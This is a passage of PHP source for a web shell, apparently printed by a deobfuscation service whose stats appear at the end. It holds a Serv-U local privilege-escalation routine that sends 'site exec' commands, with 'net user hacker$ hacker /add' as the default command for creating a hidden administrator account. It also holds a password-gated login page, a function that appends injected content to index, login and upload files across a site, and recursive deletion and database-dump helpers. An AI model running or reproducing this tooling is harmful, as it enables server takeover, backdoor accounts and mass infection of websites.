            echo "<font color=blue>Send: $sendbuf</font><br>";
            $recvbuf = fgets($exp, 1024);
            echo "<font color=red>Recv: $recvbuf</font><br>";
            $sendbuf = "PASS ".$password."\r\n";
            fputs($exp, $sendbuf, strlen($sendbuf));
            echo "<font color=blue>Send: $sendbuf</font><br>";
            $recvbuf = fgets($exp, 1024);
            echo "<font color=red>Recv: $recvbuf</font><br>";
            $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
            fputs($exp, $sendbuf, strlen($sendbuf));
            echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["SUCommand"]."</font><br>";
            $recvbuf = fgets($exp, 1024);
            echo "<font color=red>Recv: $recvbuf</font><br>";
            echo "**********************************************************<br>";
            echo "Starting Delete Domain ...<br>";
            echo "**********************************************************<br>";
            $sendbuf = $deldomain;
            fputs($sock, $sendbuf, strlen($sendbuf));
            echo "<font color=blue>Send: $sendbuf</font><br>";
            $recvbuf = fgets($sock, 1024);
            echo "<font color=red>Recv: $recvbuf</font><br>";
        }else{
            echo "All done ...<br>";
            echo "**********************************************************<br>";
        }
        echo "</td></tr></table>";
        fclose($sock);
        if($job!=="adduser") fclose($exp);
    }
    ?>
<table width="760" border="0" cellpadding="3" cellspacing="1"
    bgcolor="#ffffff">
    <tr class="firstalt">
        <td align="center">Serv-U  & </td>
    </tr>
    <form action="?action=SUExp" method="POST">
    <tr class="secondalt">
        <td align="center">LocalPort: <input name="SUPort" type="text"
            class="INPUT" id="SUPort" value="43958" size="7"> LocalUser: <input
            name="SUUser" type="text" class="INPUT" id="SUUser"
            value="LocalAdministrator"> LocalPass: <input name="SUPass"
            type="text" class="INPUT" id="SUPass" value="#l@$ak#.lk;0@P"> <br>
            <?php
            if($job!=="adduser"){
                ?> Command : <input name="SUCommand" type="text" class="INPUT"
            id="SUCommand" value="net user hacker$ hacker /add" size="50"> &nbsp;<a
            href="?action=SUExp&job=adduser">()</a> - <a href="#"
            title=""
            onClick="alert('hacker$hackerEXPhacker\n\nsite exec \n\n')">(?)</a>
        <input name="user" type="hidden" value="hacker$"> <input
            name="password" type="hidden" value="hacker"> <input name="part"
            type="hidden" value="C:\"> <?}
      else{
        ?> : <input name="user" type="text" class="INPUT" value="hacker$"
            size="20"> : <input name="password" type="text" class="INPUT"
            value="hacker" size="20"> : <input name="part" type="text"
            class="INPUT" value="C:\" size="20"> <a href="?action=SUExp">(CMD)</a>
        - <a href="#" title="" onClick="alert('')">(?)</a> <input
            name="job" type="hidden" value="<?=$job?>"> <?php
      }
      ?></td>
    </tr>
    <tr class="secondalt">
        <td align="center"><input name="Submit" type="submit" class="input"
            id="Submit" value=""> <input name="Submit" type="reset"
            class="INPUT" value=""></td>
    </tr>
    </form>
</table>
      <?php
}
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
    <tr>
        <td><FONT color=#ff3300>:</font></td>
        <td align="right"><?php
        debuginfo();
        ob_end_flush();
        ?></td>
    </tr>
</table>
</center>
</body>
</html>
<?php
/**
 * ======================================================
 *       
 * ======================================================
 */
        // 
function loginpage() {
    global $hidden,$alexa;
    if($hidden=="44997"){
//      echo <<<EOF
?>
<style type="text/css">
input {
    font-family: "Verdana";
    font-size: "11px";
    BACKGROUND-COLOR: "#FFFFFF";
    height: "18px";
    border: "1px solid #666666";
}
</style>
<table width="416" border="0" align="center" cellpadding="0"
    cellspacing="0">
    <form method="POST" action="">
    <tr>
        <td height="75" align="center"><span
            style="font-size: 11px; font-family: Verdana">: </span><input
            name="adminpass" type="password" size="20"> <input type="hidden"
            name="do" value="login"> <input type="submit" value=""></td>
    </tr>
    </form>
<?php
//EOF;
    if($alexa!=="no"){
//      echo <<<EOF
?>
</table>
<?php
//EOF;
        }
    }

exit;
}
//end loginpage()

        // 
        function debuginfo() {
            global $starttime;
            $mtime = explode(' ', microtime());
            $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
            echo " $totaltime ";
        }

        // 
        function stripslashes_array(&$array) {
            while(list($key,$var) = each($array)) {
                if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
                    if (is_string($var)) {
                        $array[$key] = stripslashes($var);
                    }
                    if (is_array($var))  {
                        $array[$key] = stripslashes_array($var);
                    }
                }
            }
            return $array;
        }


        // 
        function deltree($deldir) {
            $mydir=@dir($deldir);
            while($file=$mydir->read()) {
                if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
                    @chmod("$deldir/$file",0777);
                    deltree("$deldir/$file");
                }
                if (is_file("$deldir/$file")) {
                    @chmod("$deldir/$file",0777);
                    @unlink("$deldir/$file");
                }
            }
            $mydir->close();
            @chmod("$deldir",0777);
            return (@rmdir($deldir)) ? 1 : 0;
        }

        // 
        function dir_writeable($dir) {
            if (!is_dir($dir)) {
                @mkdir($dir, 0777);
            }
            if(is_dir($dir)) {
                if ($fp = @fopen("$dir/test.txt", 'w')) {
                    @fclose($fp);
                    @unlink("$dir/test.txt");
                    $writeable = 1;
                } else {
                    $writeable = 0;
                }
            }
            return $writeable;
        }

        // 
        function getrowbg() {
            global $bgcounter;
            if ($bgcounter++%2==0) {
                return "firstalt";
            } else {
                return "secondalt";
            }
        }

        // 
        function getPath($mainpath, $relativepath) {
            global $dir;
            $mainpath_info           = explode('/', $mainpath);
            $relativepath_info       = explode('/', $relativepath);
            $relativepath_info_count = count($relativepath_info);
            for ($i=0; $i<$relativepath_info_count; $i++) {
                if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
                if ($relativepath_info[$i] == '..') {
                    $mainpath_info_count = count($mainpath_info);
                    unset($mainpath_info[$mainpath_info_count-1]);
                    continue;
                }
                $mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
            } //end for
            return implode('/', $mainpath_info);
        }
        function dirtree($path,$mm)
        {
            $d =@dir("$path");
            while (false !== ($entry = $d->read())) {
                if($entry == "." || $entry == "..") continue;
                $file=$d->path."/" .$entry;
                if(@is_dir($file))
                {
                    dirtree($file,$mm);
                }
                else
                {
                    if(@ereg("default\.|index\.|admin\.|bbs\.|reg\.|help\.|upfile\.|upload\.|cart\.|class\.|login\.|diy\.|no\.|ok\.|del\.|sql\.|user\.|ubb\.|ftp\.|asp\.|top\.|new\.|open\.|name\.|email\.|img\.|images\.|web\.|blog\.|save\.|data\.|add\.|edit\.|main\.|form\.|game\.|about\.|manager\.|book\.|bt\.|mp3\.|vod\.|error\.|copy\.|move\.|down\.|system\.|logo\.|QQ\.|520\.|newup\.|myup\.|play\.|show\.|view\.|ip\.|err404\.|send\.|foot\.|char\.|info\.|list\.|shop\.|err\.|nc\.|ad\.|flash\.|text\.|admin_upfile\.|admin_upload\.|upfile_load\.|upfile_soft\.|upfile_photo\.|upfile_softpic\.|vip\.|505\.|tag\.|search\.|list\.|common\.|show\.|count\.|download\.|php\.",$file)) {
                        $mm=stripcslashes( trim( $mm ) );//
                        $handle = @fopen ("$file", "a");
                        @fwrite($handle, "$mm");
                        @fclose($handle);
                        echo ":$file<br>";
                    }
                }
            }
            $d->close();
        }
        // PHP
        function getphpcfg($varname) {
            switch($result = get_cfg_var($varname)) {
                case 0:
                    return "No";
                    break;
                case 1:
                    return "Yes";
                    break;
                default:
                    return $result;
                    break;
            }
        }

        // 
        function getfun($funName) {
            return (false !== function_exists($funName)) ? "Yes" : "No";
        }
        /**
         *
         * ZIP
         * @author Daniel Luo
         */
        class zip
        {

            var $datasec, $ctrl_dir = array();
            var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
            var $old_offset = 0; var $dirs = Array(".");
            function Add($files,$compact)
            {
                if(!is_array($files[0])) $files=Array($files);

                for($i=0;$files[$i];$i++){
                    $fn = $files[$i];
                    if(!in_Array(dirname($fn[0]),$this->dirs))
                    $this->add_Dir(dirname($fn[0]));
                    if(basename($fn[0]))
                    $ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact);
                }
                return $ret;
            }
            function get_file()
            {
                $data = implode('', $this -> datasec);
                $ctrldir = implode('', $this -> ctrl_dir);

                return $data . $ctrldir . $this -> eof_ctrl_dir .
                pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).
                pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
            }
            function ReadCentralDir($zip,$zip_name)
            {
                $size = filesize($zip_name);
                if ($size < 277) $maximum_size = $size;
                else $maximum_size=277;
                @fseek($zip, $size-$maximum_size);
                $pos = ftell($zip); $bytes = 0x00000000;
                while ($pos < $size)
                {
                    $byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte);
                    if ($bytes == 0x504b0506){ $pos++; break; } $pos++;
                }
                $data=unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip,18));
                if ($data['comment_size'] != 0)
                $centd['comment'] = fread($zip, $data['comment_size']);
                else $centd['comment'] = ''; $centd['entries'] = $data['entries'];
                $centd['disk_entries'] = $data['disk_entries'];
                $centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start'];
                $centd['size'] = $data['size'];  $centd['disk'] = $data['disk'];
                return $centd;
            }
            function ReadCentralFileHeaders($zip){
                $binary_data = fread($zip, 46);
                $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data);
                if ($header['filename_len'] != 0)
                $header['filename'] = fread($zip,$header['filename_len']);
                else $header['filename'] = '';
                if ($header['extra_len'] != 0)
                $header['extra'] = fread($zip, $header['extra_len']);
                else $header['extra'] = '';
                if ($header['comment_len'] != 0)
                $header['comment'] = fread($zip, $header['comment_len']);
                else $header['comment'] = '';
                if ($header['mdate'] && $header['mtime'])
                {
                    $hour = ($header['mtime'] & 0xF800) >> 11;
                    $minute = ($header['mtime'] & 0x07E0) >> 5;
                    $seconde = ($header['mtime'] & 0x001F)*2;
                    $year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
                    $month = ($header['mdate'] & 0x01E0) >> 5;
                    $day = $header['mdate'] & 0x001F;
                    $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
                } else {
                    $header['mtime'] = time();
                }
                $header['stored_filename'] = $header['filename'];
                $header['status'] = 'ok';
                if (substr($header['filename'], -1) == '/')
                $header['external'] = 0x41FF0010;
                return $header;
            }
            function add_dir($name)
            {
                $name = str_replace("\\", "/", $name);
                $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
                $fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
                $fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);
                $this -> datasec[] = $fr;
                $new_offset = strlen(implode("", $this->datasec));
                $cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
                $cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
                $cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );
                $ext = "\xff\xff\xff\xff";
                $cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name;
                $this -> ctrl_dir[] = $cdrec;
                $this -> old_offset = $new_offset;
                $this -> dirs[] = $name;
            }
            function get_List($zip_name)
            {
                $zip = @fopen($zip_name, 'rb');
                if(!$zip) return(0);
                $centd = $this->ReadCentralDir($zip,$zip_name);
                @rewind($zip);
                @fseek($zip, $centd['offset']);
                for ($i=0; $i<$centd['entries']; $i++)
                {
                    $header = $this->ReadCentralFileHeaders($zip);
                    $header['index'] = $i;$info['filename'] = $header['filename'];
                    $info['stored_filename'] = $header['stored_filename'];
                    $info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size'];
                    $info['crc'] = strtoupper(dechex( $header['crc'] ));
                    $info['mtime'] = $header['mtime']; $info['comment'] = $header['comment'];
                    $info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0;
                    $info['index'] = $header['index'];$info['status'] = $header['status'];
                    $ret[]=$info; unset($header);
                }
                return $ret;
            }
            function add_File($data, $name, $compact = 1)
            {
                $name     = str_replace('\\', '/', $name);
                $dtime    = dechex($this->DosTime());
                $hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5]
                . '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1];
                eval('$hexdtime = "' . $hexdtime . '";');
                if($compact)
                $fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime;
                else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime;
                $unc_len = strlen($data); $crc = crc32($data);
                if($compact){
                    $zdata = gzcompress($data); $c_len = strlen($zdata);
                    $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
                }else{
                    $zdata = $data;
                }
                $c_len=strlen($zdata);
                $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
                $fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata;
                $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
                $this -> datasec[] = $fr;
                $new_offset        = strlen(implode('', $this->datasec));
                if($compact)
                $cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00";
                else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00";
                $cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
                $cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 );
                $cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 );
                $cdrec .= pack('V', $this -> old_offset );
                $this -> old_offset = $new_offset;
                $cdrec .= $name;
                $this -> ctrl_dir[] = $cdrec;
                return true;
            }

            function DosTime() {
                $timearray = getdate();
                if ($timearray['year'] < 1980) {
                    $timearray['year'] = 1980; $timearray['mon'] = 1;
                    $timearray['mday'] = 1; $timearray['hours'] = 0;
                    $timearray['minutes'] = 0; $timearray['seconds'] = 0;
                }
                return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) |     ($timearray['mday'] << 16) | ($timearray['hours'] << 11) |
                ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
            }
            function Extract ( $zn, $to, $index = Array(-1) )
            {
                $ok = 0; $zip = @fopen($zn,'rb');
                if(!$zip) return(-1);
                $cdir = $this->ReadCentralDir($zip,$zn);
                $pos_entry = $cdir['offset'];

                if(!is_array($index)){ $index = array($index);  }
                for($i=0; $index[$i];$i++){
                    if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries'])
                    return(-1);
                }

                for ($i=0; $i<$cdir['entries']; $i++)
                {
                    @fseek($zip, $pos_entry);
                    $header = $this->ReadCentralFileHeaders($zip);
                    $header['index'] = $i; $pos_entry = ftell($zip);
                    @rewind($zip); fseek($zip, $header['offset']);
                    if(in_array("-1",$index)||in_array($i,$index))
                    $stat[$header['filename']]=$this->ExtractFile($header, $to, $zip);

                }
                fclose($zip);
                return $stat;
            }
            function ExtractFile($header,$to,$zip)
            {
                $header = $this->readfileheader($zip);

                if(substr($to,-1)!="/") $to.="/";
                if(!@is_dir($to)) @mkdir($to,0777);

                $pth = explode("/",dirname($header['filename']));
                for($i=0;isset($pth[$i]);$i++){
                    if(!$pth[$i]) continue;$pthss.=$pth[$i]."/";
                    if(!is_dir($to.$pthss)) @mkdir($to.$pthss,0777);
                }
                if (!($header['external']==0x41FF0010)&&!($header['external']==16))
                {
                    if ($header['compression']==0)
                    {
                        $fp = @fopen($to.$header['filename'], 'wb');
                        if(!$fp) return(-1);
                        $size = $header['compressed_size'];

                        while ($size != 0)
                        {
                            $read_size = ($size < 2048 ? $size : 2048);
                            $buffer = fread($zip, $read_size);
                            $binary_data = pack('a'.$read_size, $buffer);
                            @fwrite($fp, $binary_data, $read_size);
                            $size -= $read_size;
                        }
                        fclose($fp);
                        touch($to.$header['filename'], $header['mtime']);

                    }else{
                        $fp = @fopen($to.$header['filename'].'.gz','wb');
                        if(!$fp) return(-1);
                        $binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']),
                        Chr(0x00), time(), Chr(0x00), Chr(3));

                        fwrite($fp, $binary_data, 10);
                        $size = $header['compressed_size'];

                        while ($size != 0)
                        {
                            $read_size = ($size < 1024 ? $size : 1024);
                            $buffer = fread($zip, $read_size);
                            $binary_data = pack('a'.$read_size, $buffer);
                            @fwrite($fp, $binary_data, $read_size);
                            $size -= $read_size;
                        }

                        $binary_data = pack('VV', $header['crc'], $header['size']);
                        fwrite($fp, $binary_data,8); fclose($fp);

                        $gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress");
                        if(!$gzp) return(-2);
                        $fp = @fopen($to.$header['filename'],'wb');
                        if(!$fp) return(-1);
                        $size = $header['size'];

                        while ($size != 0)
                        {
                            $read_size = ($size < 2048 ? $size : 2048);
                            $buffer = gzread($gzp, $read_size);
                            $binary_data = pack('a'.$read_size, $buffer);
                            @fwrite($fp, $binary_data, $read_size);
                            $size -= $read_size;
                        }
                        fclose($fp); gzclose($gzp);

                        touch($to.$header['filename'], $header['mtime']);
                        @unlink($to.$header['filename'].'.gz');

                    }}
                    return true;
            }
            function ReadFileHeader($zip)
            {
                $binary_data = fread($zip, 30);
                $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data);

                $header['filename'] = fread($zip, $data['filename_len']);
                if ($data['extra_len'] != 0) {
                    $header['extra'] = fread($zip, $data['extra_len']);
                } else { $header['extra'] = ''; }

                $header['compression'] = $data['compression'];$header['size'] = $data['size'];
                $header['compressed_size'] = $data['compressed_size'];
                $header['crc'] = $data['crc']; $header['flag'] = $data['flag'];
                $header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime'];

                if ($header['mdate'] && $header['mtime']){
                    $hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5;
                    $seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980;
                    $month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F;
                    $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
                }else{$header['mtime'] = time();}

                $header['stored_filename'] = $header['filename'];
                $header['status'] = "ok";
                return $header;
            }
        }

        function addziparray($dir2) //ZIP
        {
            global $dir,$zipfilearray;
            @$dirs=opendir($dir."/".$dir2);
            while (@$file=readdir($dirs)) {
                if(!is_dir("$dir/$dir2/$file")) {
                    $zipfilearray[]="$dir2/$file";
                }
                elseif($file!="."&&$file!="..") {
                    addziparray("$dir2/$file");
                }
            }
            @closedir($dirs);
        }
        function hlinK($str=""){
            $myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL');
            $ret=$_SERVER['PHP_SELF']."?";
            $new=explode("&",$str);
            foreach ($_GET as $key => $v){
                $add=1;
                foreach($new as $m){
                    $el = explode("=", $m);
                    if ($el[0]==$key)$add=0;
                }
                if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
            }
            $ret.=$str;
            return $ret;
        }

        /**
         *  
         */
        function sqldumptable($table, $fp=0) {
            $tabledump = "DROP TABLE IF EXISTS $table;\n";
            $tabledump .= "CREATE TABLE $table (\n";

            $firstfield=1;

            $fields = mysql_query("SHOW FIELDS FROM $table");
            while ($field = mysql_fetch_array($fields)) {
                if (!$firstfield) {
                    $tabledump .= ",\n";
                } else {
                    $firstfield=0;
                }
                $tabledump .= "   $field[Field] $field[Type]";
                if (!empty($field["Default"])) {
                    $tabledump .= " DEFAULT '$field[Default]'";
                }
                if ($field['Null'] != "YES") {
                    $tabledump .= " NOT NULL";
                }
                if ($field['Extra'] != "") {
                    $tabledump .= " $field[Extra]";
                }
            }
            mysql_free_result($fields);

            $keys = mysql_query("SHOW KEYS FROM $table");
            while ($key = mysql_fetch_array($keys)) {
                $kname=$key['Key_name'];
                if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
                    $kname="UNIQUE|$kname";
                }
                if(!is_array($index[$kname])) {
                    $index[$kname] = array();
                }
                $index[$kname][] = $key['Column_name'];
            }
            mysql_free_result($keys);

            while(list($kname, $columns) = @each($index)) {
                $tabledump .= ",\n";
                $colnames=implode($columns,",");

                if ($kname == "PRIMARY") {
                    $tabledump .= "   PRIMARY KEY ($colnames)";
                } else {
                    if (substr($kname,0,6) == "UNIQUE") {
                        $kname=substr($kname,7);
                    }
                    $tabledump .= "   KEY $kname ($colnames)";
                }
            }

            $tabledump .= "\n);\n\n";
            if ($fp) {
                fwrite($fp,$tabledump);
            } else {
                echo $tabledump;
            }

            $rows = mysql_query("SELECT * FROM $table");
            $numfields = mysql_num_fields($rows);
            while ($row = mysql_fetch_array($rows)) {
                $tabledump = "INSERT INTO $table VALUES(";

                $fieldcounter=-1;
                $firstfield=1;
                while (++$fieldcounter<$numfields) {
                    if (!$firstfield) {
                        $tabledump.=", ";
                    } else {
                        $firstfield=0;
                    }

                    if (!isset($row[$fieldcounter])) {
                        $tabledump .= "NULL";
                    } else {
                        $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
                    }
                }

                $tabledump .= ");\n";

                if ($fp) {
                    fwrite($fp,$tabledump);
                } else {
                    echo $tabledump;
                }
            }
            mysql_free_result($rows);
        }

        class FORMS {
            function tableheader() {
                echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
            }

            function headerform($arg=array()) {
                global $dir;
                if ($arg[enctype]){
                    $enctype="enctype=\"$arg[enctype]\"";
                } else {
                    $enctype="";
                }
                if (!isset($arg[method])) {
                    $arg[method] = "POST";
                }
                if (!isset($arg[action])) {
                    $arg[action] = '';
                }
                echo "  <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
                echo "  <tr>\n";
                echo "    <td>".$arg[content]."</td>\n";
                echo "  </tr>\n";
                echo "  </form>\n";
            }

            function tdheader($title) {
                global $dir;
                echo "  <tr class=\"firstalt\">\n";
                echo "  <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\"></a>]</b></td>\n";
                echo "  </tr>\n";
            }

            function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
                if ($bgcolor=='2') {
                    $css="secondalt";
                } elseif ($bgcolor=='1') {
                    $css="firstalt";
                } else {
                    $css=$bgcolor;
                }
                $height = empty($height) ? "" : " height=".$height;
                $colspan = empty($colspan) ? "" : " colspan=".$colspan;
                echo "  <tr class=\"".$css."\">\n";
                echo "  <td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
                echo "  </tr>\n";
            }

            function tablefooter() {
                echo "</table>\n";
            }

            function formheader($action='',$title,$target='') {
                global $dir;
                $target = empty($target) ? "" : " target=\"".$target."\"";
                echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
                echo "  <tr class=\"firstalt\">\n";
                echo "  <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\"></a>]</b></td>\n";
                echo "  </tr>\n";
            }

            function makehidden($name,$value=''){
                echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
            }

            function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
                $css = ($css == 'input') ? " class=\"input\"" : "";
                $input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
                return $input;
            }

            function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
                $textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
                return $textarea;
            }

            function formfooter($over='',$height=''){
                $height = empty($height) ? "" : " height=\"".$height."\"";
                echo "  <tr class=\"secondalt\">\n";
                echo "  <td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value=\"\"></td>\n";
                echo "  </tr>\n";
                echo " </form>\n";
                echo $end = empty($over) ? "" : "</table>\n";
            }
            /**
             *
             * 
             * @param unknown_type $arg
             */
            function makeselect($arg = array()){
                if ($arg[multiple]==1) {
                    $multiple = " multiple";
                    if ($arg[size]>0) {
                        $size = "size=$arg[size]";
                    }
                }
                if ($arg[css]==0) {
                    $css = "class=\"input\"";
                }
                $select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
                if (is_array($arg[option])) {
                    foreach ($arg[option] AS $key=>$value) {
                        if (!is_array($arg[selected])) {
                            if ($arg[selected]==$key) {
                                $select .= "<option value=\"$key\" selected>$value</option>\n";
                            } else {
                                $select .= "<option value=\"$key\">$value</option>\n";
                            }

                        } elseif (is_array($arg[selected])) {
                            if ($arg[selected][$key]==1) {
                                $select .= "<option value=\"$key\" selected>$value</option>\n";
                            } else {
                                $select .= "<option value=\"$key\">$value</option>\n";
                            }
                        }
                    }
                }
                $select .= "</select>\n";
                return $select;
            }
        }
        /**
         *
         * 
         * @param unknown_type $path
         */
        function find($path)
        {
            global $oldkey,$type,$type2,$endline,$beline;
            if(is_dir("$path")){
                $tempdir=opendir("$path");
                while($f=readdir($tempdir)){ if($f=="."||$f=="..")continue;  find("$path/$f");}
                closedir($tempdir);
            }else{
                if(filesize("$path")){
                    $fp=fopen("$path","r");
                    $msg=fread($fp, filesize("$path"));
                    fclose($fp);
                    if(strpos($msg, $oldkey) !== false) {
                        $dir = dirname($path);
                        $file = basename($path);
                        if($type=="list"){
                            $mymsg = explode("\n",$msg);
                            $long = count($mymsg);
                            $tmp = explode($oldkey,$msg);
                            $tmp = explode("\n",$tmp[0]);
                            $first = count($tmp);
                            $end = "[".$first."/".$long."]";
                        }
                        if($type2=="getpath"){
                            $get = explode($oldkey,$msg);
                            $get = strlen($get[0]);
                            if(isset($beline)){
                                $get = $get-$beline;
                            }
                            $getpath = htmlspecialchars(substr($msg, $get, $endline));
                            $getpath = "title = \"".$getpath."\"";
                        }
                        echo "<span class=\"redfont\" $getpath>:$dir/$file</span> |<a href=\"?action=editfile&dir=$dir&editfile=$file\" target=\"_blank\">view+edit</a> | $end <br>";
                    }
                }
            }
        }
?>

Function Calls

header 1

Variables

None

Stats

MD5 0e7c0efac464ffd867c83c9d126d15b5
Eval Count 0
Decode Time 493 ms